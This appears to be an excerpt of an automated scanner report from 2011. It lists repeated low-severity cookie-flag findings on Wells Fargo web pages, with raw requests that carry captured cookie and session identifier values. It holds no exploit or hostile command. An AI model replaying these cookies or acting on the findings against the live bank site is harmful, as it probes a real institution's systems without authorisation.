HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:54 GMT Content-length: 8678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/id_credit_protection/idtheft HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Identity Theft Protection - Id ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/hsa/enroll HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 9955 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Health Savings Acc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/investmentservices/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 8732 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/more HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:51 GMT Content-length: 12093 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/mutual_funds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 12036 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Mutual Fund Center ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 9837 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/openira/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open an IRA (Individual Retire ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/about/fdic HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:08 GMT Content-length: 9678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/applications/inprogress HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:07 GMT Content-length: 4747 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:05 GMT Content-length: 6663 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:06 GMT Content-length: 6816 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator/atm/preSearch HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-type: text/html Cache-Control: no-cache="Set-Cookie" Location: https://www.wellsfargo.com/locator/atm/search Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator/atm/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:17 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:41 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:43 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/ Content-Language: en Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online_brokerage/education/trading/volatile/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-type: text/html; charset=ISO-8859-1 Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/ Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/banking HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:39 GMT Content-length: 10949 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Banking Overview</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/loans_credit HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:40 GMT Content-length: 10611 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:47 GMT Content-length: 7834 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <title>Wells Fargo - Personal C ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo ... Rate & Payment ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7654 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy & Security ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 7546 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 6368 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
